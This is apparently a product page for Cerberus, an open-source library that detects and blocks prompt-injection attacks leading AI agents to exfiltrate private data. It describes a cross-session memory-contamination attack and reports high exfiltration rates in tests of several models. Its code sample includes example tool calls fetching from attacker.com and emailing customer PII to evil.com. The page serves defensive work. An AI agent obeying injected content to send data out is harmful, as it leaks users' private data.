Every AI agent that can read private data, process external content, and send outbound messages is vulnerable to the same fundamental attack. Cerberus detects, correlates, and blocks it โ in real time, before data leaves your system.
Every AI agent with three capabilities is exploitable. The attack is reproducible today with free-tier API access and three function calls.
When all three fire in the same session, Cerberus scores the session at 3/4
and interrupts the outbound call โ before data leaves your system.
Layer 4 (novel): Cross-session memory contamination โ an attacker injects a payload into Session 1 that triggers exfiltration in Session 3. No existing tool detects this. Cerberus ships the first deployable defense.
Cerberus wraps your existing tool executors. No agent framework changes. No model swaps.
N=285 real API calls. 30 payloads ร 3 trials ร 3 providers. Wilson 95% confidence intervals. 6-factor causation scoring. 5 negative control runs per provider โ 0 false exfiltrations.
| Provider | Model | Any Exfiltration | Full Injection Compliance | 95% CI |
|---|---|---|---|---|
| OpenAI | gpt-4o-mini | 100% (90/90) | 17.8% (16/90) | [11.2%, 26.9%] |
| Anthropic | claude-sonnet-4 | 100% (90/90) | 2.2% (2/90) | [0.6%, 7.7%] |
| gemini-2.5-flash | 98.9% (89/90) | 48.9% (44/90) | [38.8%, 59.0%] |
| Provider | Detection Rate | False Positive Rate | L1 Accuracy | L2 Accuracy |
|---|---|---|---|---|
| OpenAI | 23.3% | 0.0% | 100% | 100% |
| Anthropic | 2.2% | 0.0% | 100% | 100% |
| 70.0% | 0.0% | 100% | 100% |
L1 and L2 are deterministic โ 100% accuracy across all 285 runs, zero FPs, zero FNs. L3 detection tracks successful injection compliance. Control group: 0/15 false exfiltrations.
Install the package and wrap your tool executors.
npm install @cerberus-ai/core
import { guard } from '@cerberus-ai/core'; // Your existing tool executors const tools = { readDatabase: async (args) => db.query(args.sql), fetchUrl: async (args) => fetch(args.url).then(r => r.text()), sendEmail: async (args) => mailer.send(args), }; // One function call โ Cerberus intercepts transparently const { executors: secured } = guard( tools, { alertMode: 'interrupt', threshold: 3, trustOverrides: [ { toolName: 'readDatabase', trustLevel: 'trusted' }, { toolName: 'fetchUrl', trustLevel: 'untrusted' }, ], }, ['sendEmail'], // outbound tools โ L3 monitors these ); // Use exactly like before โ Cerberus runs in the middle await secured.readDatabase({ sql: 'SELECT * FROM customers' }); await secured.fetchUrl({ url: 'https://attacker.com/payload' }); await secured.sendEmail({ to: 'audit@evil.com', body: piiData }); // โ [Cerberus] Tool call blocked โ risk score 3/4
See the getting-started guide for the full walkthrough, or try the Docker demo with no API keys:
docker run --rm ghcr.io/odingard/cerberus-demo
Native adapters for every major agentic AI framework.
Open source. MIT license. Zero runtime dependencies beyond SQLite.